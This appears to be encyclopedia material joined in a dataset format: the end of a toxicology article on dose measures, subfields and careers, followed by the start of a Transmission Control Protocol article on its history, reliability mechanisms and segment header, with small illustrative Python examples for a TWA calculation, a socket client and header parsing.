Pivotal events in science include the discovery of penicillin, the elucidation of the DNA double helix, and the development of computers. ... Toxicity testing is approaching such a scientific pivot point. It is poised to take advantage of the revolutions in biology and biotechnology. Advances in toxicogenomics, bioinformatics, systems biology, epigenetics, and computational toxicology could transform toxicity testing from a system based on whole-animal testing to one founded primarily on in vitro methods that evaluate changes in biologic processes using cells, cell lines, or cellular components, preferably of human origin." As of 2014 that vision was still unrealized. The United States Environmental Protection Agency studied 1,065 chemical and drug substances in their ToxCast program (part of the CompTox Chemicals Dashboard) using in silico modelling and a human pluripotent stem cell-based assay to predict in vivo developmental intoxicants based on changes in cellular metabolism following chemical exposure. Major findings from the analysis of this ToxCast_STM dataset published in 2020 include: (1) 19% of 1065 chemicals yielded a prediction of developmental toxicity, (2) assay performance reached 79%–82% accuracy with high specificity (> 84%) but modest sensitivity (< 67%) when compared with in vivo animal models of human prenatal developmental toxicity, (3) sensitivity improved as more stringent weights of evidence requirements were applied to the animal studies, and (4) statistical analysis of the most potent chemical hits on specific biochemical targets in ToxCast revealed positive and negative associations with the STM response, providing insights into the mechanistic underpinnings of the targeted endpoint and its biological domain. In some cases shifts away from animal studies have been mandated by law or regulation; the European Union (EU) prohibited use of animal testing for cosmetics in 2013. Dose response complexities Most chemicals display a classic dose response curve – at a low dose (below a threshold), no effect is observed. Some show a phenomenon known as sufficient challenge – a small exposure produces animals that "grow more rapidly, have better general appearance and coat quality, have fewer tumors, and live longer than the control animals". A few chemicals have no well-defined safe level of exposure. These are treated with special care. Some chemicals are subject to bioaccumulation as they are stored in rather than being excreted from the body; these also receive special consideration. Several measures are commonly used to describe toxic dosages according to the degree of effect on an organism or a population, and some are specifically defined by various laws or organizational usage.
These include:
LD50 = Median lethal dose, a dose that will kill 50% of an exposed population
NOEL = No-Observed-Effect-Level, the highest dose known to show no effect
NOAEL = No-Observed-Adverse-Effect-Level, the highest dose known to show no adverse effects
PEL = Permissible Exposure Limit, the highest concentration permitted under US OSHA regulations
STEL = Short-Term Exposure Limit, the highest concentration permitted for short periods of time, in general 15–30 minutes
TWA = Time-Weighted Average, the average amount of an agent's concentration over a specified period of time, usually 8 hours (see the worked sketch below)
TTC = Threshold of Toxicological Concern, a concept that has been applied to low-level contaminants such as the constituents of tobacco smoke
Types Medical toxicology is the discipline that requires physician status (MD or DO degree plus specialty education and experience). Clinical toxicology is the discipline that can be practiced not only by physicians but also other health professionals with a master's degree in clinical toxicology: physician extenders (physician assistants, nurse practitioners), nurses, pharmacists, and allied health professionals. Forensic toxicology is the discipline that makes use of toxicology and other disciplines such as analytical chemistry, pharmacology and clinical chemistry to aid medical or legal investigation of death, poisoning, and drug use. The primary concern for forensic toxicology is not the legal outcome of the toxicological investigation or the technology utilized, but rather the obtainment and interpretation of results. Computational toxicology is a discipline that develops mathematical and computer-based models to better understand and predict adverse health effects caused by chemicals, such as environmental pollutants and pharmaceuticals. Within the Toxicology in the 21st Century project, the best predictive models were identified to be Deep Neural Networks, Random Forest, and Support Vector Machines, which can reach the performance of in vitro experiments. Occupational toxicology is the application of toxicology to chemical hazards in the workplace. Toxicology as a profession A toxicologist is a scientist or medical personnel who specializes in the study of symptoms, mechanisms, treatments and detection of venoms and toxins, especially the poisoning of people. Requirements To work as a toxicologist one should obtain a degree in toxicology or a related degree like biology, chemistry, pharmacology or biochemistry. Bachelor's degree programs in toxicology cover the chemical makeup of toxins and their effects on biochemistry, physiology and ecology. After introductory life science courses are complete, students typically enroll in labs and apply toxicology principles to research and other studies. Advanced students delve into specific sectors, like the pharmaceutical industry or law enforcement, which apply methods of toxicology in their work. The Society of Toxicology (SOT) recommends that undergraduates in postsecondary schools that do not offer a bachelor's degree in toxicology consider attaining a degree in biology or chemistry. Additionally, the SOT advises aspiring toxicologists to take statistics and mathematics courses, as well as gain laboratory experience through lab courses, student research projects and internships.
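Picking up the Time-Weighted Average from the list of dose measures above: because a TWA is just a duration-weighted mean, it can be computed directly. The sketch below is illustrative only; the intervals and concentrations are invented example numbers, not values from any regulation.

```python
# Illustrative computation of an 8-hour time-weighted average (TWA) exposure,
# as defined in the list of dose measures above. The numbers are made up.
def twa(intervals, period_hours=8.0):
    """intervals: list of (duration_hours, concentration) pairs."""
    total_exposure = sum(duration * conc for duration, conc in intervals)
    return total_exposure / period_hours

# Example shift: 4 h at 0.1 ppm, 2 h at 0.3 ppm, 2 h unexposed
print(twa([(4, 0.1), (2, 0.3), (2, 0.0)]))  # -> 0.125 ppm over 8 hours
```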
To become Medical Toxicologists, physicians in the United States complete residency training such as in Emergency Medicine, Pediatrics or Internal Medicine, followed by a fellowship in Medical Toxicology and eventual certification by the American College of Medical Toxicology (ACMT). Duties Toxicologists perform many different duties including research in the academic, nonprofit and industrial fields, product safety evaluation, consulting, public service and legal regulation. In order to research and assess the effects of chemicals, toxicologists perform carefully designed studies and experiments. These experiments help identify the specific amount of a chemical that may cause harm and potential risks of being near or using products that contain certain chemicals. Research projects may range from assessing the effects of toxic pollutants on the environment to evaluating how the human immune system responds to chemical compounds within pharmaceutical drugs. While the basic duties of toxicologists are to determine the effects of chemicals on organisms and their surroundings, specific job duties may vary based on industry and employment. For example, forensic toxicologists may look for toxic substances in a crime scene, whereas aquatic toxicologists may analyze the toxicity level of water bodies. Compensation The salary for jobs in toxicology is dependent on several factors, including level of schooling, specialization, and experience. The U.S. Bureau of Labor Statistics (BLS) notes that jobs for biological scientists, which generally include toxicologists, were expected to increase by 21% between 2008 and 2018. The BLS notes that this increase could be due to research and development growth in biotechnology, as well as budget increases for basic and medical research in biological science.
Biology and health sciences
Fields of medicine
null
30538
https://en.wikipedia.org/wiki/Transmission%20Control%20Protocol
Transmission Control Protocol
The Transmission Control Protocol (TCP) is one of the main protocols of the Internet protocol suite. It originated in the initial network implementation in which it complemented the Internet Protocol (IP). Therefore, the entire suite is commonly referred to as TCP/IP. TCP provides reliable, ordered, and error-checked delivery of a stream of octets (bytes) between applications running on hosts communicating via an IP network. Major internet applications such as the World Wide Web, email, remote administration, and file transfer rely on TCP, which is part of the transport layer of the TCP/IP suite. SSL/TLS often runs on top of TCP. TCP is connection-oriented, meaning that sender and receiver first need to establish a connection based on agreed parameters; they do this through the three-way handshake procedure. The server must be listening (passive open) for connection requests from clients before a connection is established. The three-way handshake (active open), retransmission, and error detection add to reliability but lengthen latency. Applications that do not require reliable data stream service may use the User Datagram Protocol (UDP) instead, which provides a connectionless datagram service that prioritizes time over reliability. TCP employs network congestion avoidance. However, there are vulnerabilities in TCP, including denial of service, connection hijacking, TCP veto, and reset attack. Historical origin In May 1974, Vint Cerf and Bob Kahn described an internetworking protocol for sharing resources using packet switching among network nodes. The authors had been working with Gérard Le Lann to incorporate concepts from the French CYCLADES project into the new network. The specification of the resulting protocol, Specification of Internet Transmission Control Program, was written by Vint Cerf, Yogen Dalal, and Carl Sunshine, and published in December 1974. It contains the first attested use of the term internet, as a shorthand for internetwork. The Transmission Control Program incorporated both connection-oriented links and datagram services between hosts. In version 4, the monolithic Transmission Control Program was divided into a modular architecture consisting of the Transmission Control Protocol and the Internet Protocol. This resulted in a networking model that became known informally as TCP/IP, although formally it was variously referred to as the DoD internet architecture model (DoD model for short) or DARPA model. Later, it became part of, and synonymous with, the Internet Protocol Suite. The following Internet Experiment Note (IEN) documents describe the evolution of TCP into the modern version: IEN 5, Specification of Internet Transmission Control Program TCP Version 2 (March 1977); IEN 21, Specification of Internetwork Transmission Control Program TCP Version 3 (January 1978); and IEN 27, IEN 40, IEN 44, IEN 55, IEN 81, IEN 112, and IEN 124. TCP was standardized in January 1980. In 2004, Vint Cerf and Bob Kahn received the Turing Award for their foundational work on TCP/IP. Network function The Transmission Control Protocol provides a communication service at an intermediate level between an application program and the Internet Protocol. It provides host-to-host connectivity at the transport layer of the Internet model. An application does not need to know the particular mechanisms for sending data via a link to another host, such as the required IP fragmentation to accommodate the maximum transmission unit of the transmission medium.
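To make this abstraction concrete, here is a minimal sketch of a TCP client using Python's standard socket module; the host and port are placeholder values. The application only reads and writes a byte stream, while connection establishment (the three-way handshake, performed inside create_connection), segmentation, acknowledgments, and any IP fragmentation are handled by the protocol stack.

```python
import socket

# Minimal sketch of TCP's byte-stream abstraction; "example.com" and port 80
# are placeholders. The application never sees segments, ACKs, or IP
# fragmentation: it just writes and reads an ordered, reliable byte stream.
request = b"HEAD / HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n"

with socket.create_connection(("example.com", 80)) as sock:  # handshake happens here
    sock.sendall(request)                # the stack segments and retransmits as needed
    response = b""
    while chunk := sock.recv(4096):      # bytes arrive in order, error-checked
        response += chunk

print(response.split(b"\r\n", 1)[0].decode())  # status line, e.g. "HTTP/1.1 200 OK"
```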
At the transport layer, TCP handles all handshaking and transmission details and presents an abstraction of the network connection to the application, typically through a network socket interface. At the lower levels of the protocol stack, due to network congestion, traffic load balancing, or unpredictable network behavior, IP packets may be lost, duplicated, or delivered out of order. TCP detects these problems, requests re-transmission of lost data, rearranges out-of-order data and even helps minimize network congestion to reduce the occurrence of the other problems. If the data remains undelivered, the source is notified of this failure. Once the TCP receiver has reassembled the sequence of octets originally transmitted, it passes them to the receiving application. Thus, TCP abstracts the application's communication from the underlying networking details. TCP is used extensively by many internet applications, including the World Wide Web (WWW), email, File Transfer Protocol, Secure Shell, peer-to-peer file sharing, and streaming media. TCP is optimized for accurate delivery rather than timely delivery and can incur relatively long delays (on the order of seconds) while waiting for out-of-order messages or re-transmissions of lost messages. Therefore, it is not particularly suitable for real-time applications such as voice over IP. For such applications, protocols like the Real-time Transport Protocol (RTP) operating over the User Datagram Protocol (UDP) are usually recommended instead. TCP is a reliable byte stream delivery service that guarantees that all bytes received will be identical and in the same order as those sent. Since packet transfer by many networks is not reliable, TCP achieves this using a technique known as positive acknowledgment with re-transmission. This requires the receiver to respond with an acknowledgment message as it receives the data. The sender keeps a record of each packet it sends and maintains a timer from when the packet was sent. The sender re-transmits a packet if the timer expires before receiving the acknowledgment. The timer is needed in case a packet gets lost or corrupted. While IP handles actual delivery of the data, TCP keeps track of segments – the individual units of data transmission that a message is divided into for efficient routing through the network. For example, when an HTML file is sent from a web server, the TCP software layer of that server divides the file into segments and forwards them individually to the internet layer in the network stack. The internet layer software encapsulates each TCP segment into an IP packet by adding a header that includes (among other data) the destination IP address. When the client program on the destination computer receives them, the TCP software in the transport layer re-assembles the segments and ensures they are correctly ordered and error-free as it streams the file contents to the receiving application. TCP segment structure Transmission Control Protocol accepts data from a data stream, divides it into chunks, and adds a TCP header, creating a TCP segment. The TCP segment is then encapsulated into an Internet Protocol (IP) datagram, and exchanged with peers. The term TCP packet appears in both informal and formal usage, whereas in more precise terminology segment refers to the TCP protocol data unit (PDU), datagram to the IP PDU, and frame to the data link layer PDU: Processes transmit data by calling on the TCP and passing buffers of data as arguments.
The TCP packages the data from these buffers into segments and calls on the internet module [e.g. IP] to transmit each segment to the destination TCP. A TCP segment consists of a segment header and a data section. The segment header contains 10 mandatory fields and an optional extension field (Options). The data section follows the header and is the payload data carried for the application. The length of the data section is not specified in the segment header; it can be calculated by subtracting the combined length of the segment header and IP header from the total IP datagram length specified in the IP header. Some options may only be sent when SYN is set. Option-Kind and standard lengths are given as (Option-Kind, Option-Length).
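As a rough illustration of the header layout just described, the sketch below unpacks the ten mandatory fields from the first 20 bytes of a segment. It is a simplified toy parser: it assumes network byte order, does not validate the checksum, and does not interpret any options that follow the fixed header.

```python
import struct

# Toy parser for the fixed 20-byte TCP header (network byte order).
# Options, when present, occupy the bytes between offset 20 and the
# start of the data section; this sketch does not decode them.
def parse_tcp_header(segment: bytes) -> dict:
    (src_port, dst_port, seq, ack,
     offset_flags, window, checksum, urgent) = struct.unpack("!HHIIHHHH", segment[:20])
    data_offset = (offset_flags >> 12) & 0xF   # header length in 32-bit words
    flags = offset_flags & 0x01FF              # NS/CWR/ECE/URG/ACK/PSH/RST/SYN/FIN bits
    return {
        "src_port": src_port, "dst_port": dst_port,
        "seq": seq, "ack": ack,
        "data_offset_words": data_offset,
        "syn": bool(flags & 0x002), "ack_flag": bool(flags & 0x010),
        "window": window, "checksum": checksum, "urgent_pointer": urgent,
        "payload": segment[data_offset * 4:],  # data section follows header + options
    }
```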
Technology
Internet
null